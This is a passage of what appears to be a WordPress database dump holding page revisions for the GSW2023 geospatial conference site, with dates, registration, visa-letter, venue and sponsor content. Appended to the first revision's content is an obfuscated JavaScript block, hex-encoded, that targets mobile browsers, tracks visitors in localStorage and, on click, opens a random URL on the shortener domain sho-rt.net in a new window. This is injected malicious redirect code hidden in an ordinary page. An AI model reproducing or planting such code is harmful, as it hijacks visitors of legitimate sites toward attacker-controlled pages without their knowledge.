content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 22:34:30','2023-06-09 22:34:30','',3066,'https://gsw2023.com/?p=4676',0,'revision','',0),
(4677,1,'2023-06-09 22:34:55','2023-06-09 22:34:55','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 